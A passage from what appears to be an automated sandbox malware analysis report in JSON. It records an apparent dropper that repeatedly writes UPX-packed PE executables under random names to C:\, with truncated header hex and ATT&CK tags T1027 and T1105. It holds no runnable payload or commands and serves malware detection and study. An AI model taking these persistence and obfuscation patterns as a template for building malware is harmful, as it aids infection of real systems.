\"0288086.exe\" has an entrypoint in section \"UPX1\"\n \"vvtbdn.exe\" has an entrypoint in section \"UPX1\"\n \"dbhlfn.exe\" has an entrypoint in section \"UPX1\"\n \"ptxnnrh.exe\" has an entrypoint in section \"UPX1\"\n \"xxfflb.exe\" has an entrypoint in section \"UPX1\"\n \"44680.exe\" has an entrypoint in section \"UPX1\"\n \"0024648.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" wrote 13790 bytes starting with PE header signature to file \"C:\\bbhhn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bbhhn.exe\" wrote 13810 bytes starting with PE header signature to file \"C:\\nrdvp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nrdvp.exe\" wrote 13823 bytes starting with PE header signature to file \"C:\\xlbdxlx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xlbdxlx.exe\" wrote 13841 bytes starting with PE header signature to file \"C:\\68282.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"68282.exe\" wrote 13852 bytes starting with PE header signature to file \"C:\\62242.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"62242.exe\" wrote 13865 bytes starting with PE header signature to file \"C:\\rbldl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rbldl.exe\" wrote 13877 bytes starting with PE header signature to file \"C:\\jbdbn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jbdbn.exe\" wrote 13887 bytes starting with PE header signature to file \"C:\\trdvh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"trdvh.exe\" wrote 13902 bytes starting with PE header signature to file \"C:\\vdfxt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vdfxt.exe\" wrote 13920 bytes starting with PE header signature to file \"C:\\dnppt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dnppt.exe\" wrote 13934 bytes starting with PE header signature to file \"C:\\btvxfh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"btvxfh.exe\" wrote 13949 bytes starting with PE header signature to file \"C:\\8224062.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8224062.exe\" wrote 13960 bytes starting with PE header signature to file \"C:\\64660.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"64660.exe\" wrote 13970 bytes starting with PE header signature to file \"C:\\xlfpx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xlfpx.exe\" wrote 13990 bytes starting with PE header signature to file \"C:\\pfffth.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pfffth.exe\" wrote 14010 bytes starting with PE header signature to file \"C:\\vnjvhvr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vnjvhvr.exe\" wrote 14029 bytes starting with PE header signature to file \"C:\\jpdvr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jpdvr.exe\" wrote 14045 bytes starting with PE header signature to file \"C:\\jxtxdv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jxtxdv.exe\" wrote 14059 bytes starting with PE header signature to file \"C:\\682244.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"682244.exe\" wrote 14071 bytes starting with PE header signature to file \"C:\\6040442.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6040442.exe\" wrote 14087 bytes starting with PE header signature to file \"C:\\0600220.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0600220.exe\" wrote 14100 bytes starting with PE header signature to file \"C:\\2262446.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2262446.exe\" wrote 14115 bytes starting with PE header signature to file \"C:\\266028.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"266028.exe\" wrote 14134 bytes starting with PE header signature to file \"C:\\0600240.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0600240.exe\" wrote 14154 bytes starting with PE header signature to file \"C:\\8064042.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8064042.exe\" wrote 14165 bytes starting with PE header signature to file \"C:\\hppjr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hppjr.exe\" wrote 14185 bytes starting with PE header signature to file \"C:\\jjxfht.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jjxfht.exe\" wrote 14203 bytes starting with PE header signature to file \"C:\\fvnph.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fvnph.exe\" wrote 14223 bytes starting with PE header signature to file \"C:\\60486.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"60486.exe\" wrote 14235 bytes starting with PE header signature to file \"C:\\42600.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"42600.exe\" wrote 14247 bytes starting with PE header signature to file \"C:\\40806.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"40806.exe\" wrote 14262 bytes starting with PE header signature to file \"C:\\4866828.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4866828.exe\" wrote 14272 bytes starting with PE header signature to file \"C:\\62046.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"62046.exe\" wrote 14283 bytes starting with PE header signature to file \"C:\\pdhnvj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pdhnvj.exe\" wrote 14294 bytes starting with PE header signature to file \"C:\\tjxjxxh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tjxjxxh.exe\" wrote 14306 bytes starting with PE header signature to file \"C:\\rnftf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rnftf.exe\" wrote 14322 bytes starting with PE header signature to file \"C:\\nvfdf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nvfdf.exe\" wrote 14341 bytes starting with PE header signature to file \"C:\\vhrdph.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vhrdph.exe\" wrote 14354 bytes starting with PE header signature to file \"C:\\88806.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"88806.exe\" wrote 14368 bytes starting with PE header signature to file \"C:\\8446060.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8446060.exe\" wrote 14387 bytes starting with PE header signature to file \"C:\\868648.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"868648.exe\" wrote 14402 bytes starting with PE header signature to file \"C:\\464220.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"464220.exe\" wrote 14420 bytes starting with PE header signature to file \"C:\\42442.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"42442.exe\" wrote 14439 bytes starting with PE header signature to file \"C:\\0802042.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0802042.exe\" wrote 14458 bytes starting with PE header signature to file \"C:\\rttxj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rttxj.exe\" wrote 14470 bytes starting with PE header signature to file \"C:\\fdfnr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fdfnr.exe\" wrote 14483 bytes starting with PE header signature to file \"C:\\trlhh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"trlhh.exe\" wrote 14499 bytes starting with PE header signature to file \"C:\\ntjjnl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ntjjnl.exe\" wrote 14510 bytes starting with PE header signature to file \"C:\\ldpdlv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ldpdlv.exe\" wrote 14529 bytes starting with PE header signature to file \"C:\\848066.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"848066.exe\" wrote 14547 bytes starting with PE header signature to file \"C:\\0024648.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0024648.exe\" wrote 14562 bytes starting with PE header signature to file \"C:\\44680.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"44680.exe\" wrote 14578 bytes starting with PE header signature to file \"C:\\xxfflb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xxfflb.exe\" wrote 14590 bytes starting with PE header signature to file \"C:\\ptxnnrh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ptxnnrh.exe\" wrote 14609 bytes starting with PE header signature to file \"C:\\dbhlfn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dbhlfn.exe\" wrote 14626 bytes starting with PE header signature to file \"C:\\vvtbdn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vvtbdn.exe\" wrote 14638 bytes starting with PE header signature to file \"C:\\0288086.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0288086.exe\" wrote 14651 bytes starting with PE header signature to file \"C:\\4688248.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4688248.exe\" wrote 14662 bytes starting with PE header signature to file \"C:\\22004.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"22004.exe\" wrote 14676 bytes starting with PE header signature to file \"C:\\0086084.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0086084.exe\" wrote 14688 bytes starting with PE header signature to file \"C:\\lrnlbrl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lrnlbrl.exe\" wrote 14700 bytes starting with PE header signature to file \"C:\\fplrrnr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fplrrnr.exe\" wrote 14718 bytes starting with PE header signature to file \"C:\\bvffnn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bvffnn.exe\" wrote 14737 bytes starting with PE header signature to file \"C:\\pdjrtdv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"bphvxnd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"ndjtrh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lhfrhnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"482064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"202048.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"48866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hrffr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nfbjp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"6064442.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"44424.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pdjrtdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdjrtdv.exe]- [targetUID: 00000000-00003912]\n \"bvffnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bvffnn.exe]- [targetUID: 00000000-00003912]\n \"fplrrnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fplrrnr.exe]- [targetUID: 00000000-00003976]\n \"lrnlbrl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lrnlbrl.exe]- [targetUID: 00000000-00004028]\n \"0086084.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0086084.exe]- [targetUID: 00000000-00001624]\n \"22004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22004.exe]- [targetUID: 00000000-00001624]\n \"4688248.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4688248.exe]- [targetUID: 00000000-00003528]\n \"0288086.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0288086.exe]- [targetUID: 00000000-00002836]\n \"vvtbdn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vvtbdn.exe]- [targetUID: 00000000-00004480]\n \"dbhlfn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dbhlfn.exe]- [targetUID: 00000000-00004480]\n \"ptxnnrh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ptxnnrh.exe]- [targetUID: 00000000-00000728]\n \"xxfflb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xxfflb.exe]- [targetUID: 00000000-00002812]\n \"44680.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44680.exe]- [targetUID: 00000000-00002812]\n \"0024648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0024648.exe]- [targetUID: 00000000-00002528]\n \"848066.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\848066.exe]- [targetUID: 00000000-00002528]\n \"ldpdlv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldpdlv.exe]- [targetUID: 00000000-00003012]\n \"ntjjnl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ntjjnl.exe]- [targetUID: 00000000-00001472]\n \"trlhh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\trlhh.exe]- [targetUID: 00000000-00001472]\n \"fdfnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fdfnr.exe]- [targetUID: 00000000-00001000]\n \"rttxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rttxj.exe]- [targetUID: 00000000-00000904]\n \"0802042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0802042.exe]- [targetUID: 00000000-00000904]\n \"42442.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42442.exe]- [targetUID: 00000000-00001240]\n \"464220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\464220.exe]- [targetUID: 00000000-00001768]\n \"868648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\868648.exe]- [targetUID: 00000000-00001768]\n \"8446060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8446060.exe]- [targetUID: 00000000-00003176]\n \"88806.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\88806.exe]- [targetUID: 00000000-00003176]\n \"vhrdph.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vhrdph.exe]- [targetUID: 00000000-00003180]\n \"nvfdf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nvfdf.exe]- [targetUID: 00000000-00003180]\n \"rnftf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rnftf.exe]- [targetUID: 00000000-00004084]\n \"tjxjxxh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjxjxxh.exe]- [targetUID: 00000000-00004084]\n \"pdhnvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdhnvj.exe]- [targetUID: 00000000-00003460]\n \"62046.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\62046.exe]- [targetUID: 00000000-00002712]\n \"4866828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4866828.exe]- [targetUID: 00000000-00002712]\n \"40806.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\40806.exe]- [targetUID: 00000000-00000976]\n \"42600.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42600.exe]- [targetUID: 00000000-00000976]\n \"60486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60486.exe]- [targetUID: 00000000-00004268]\n \"fvnph.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fvnph.exe]- [targetUID: 00000000-00004268]\n \"jjxfht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jjxfht.exe]- [targetUID: 00000000-00003224]\n \"hppjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hppjr.exe]- [targetUID: 00000000-00004408]\n \"8064042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8064042.exe]- [targetUID: 00000000-00004408]\n \"0600240.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0600240.exe]- [targetUID: 00000000-00004404]\n \"266028.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\266028.exe]- [targetUID: 00000000-00003728]\n \"2262446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2262446.exe]- [targetUID: 00000000-00003448]\n \"0600220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX 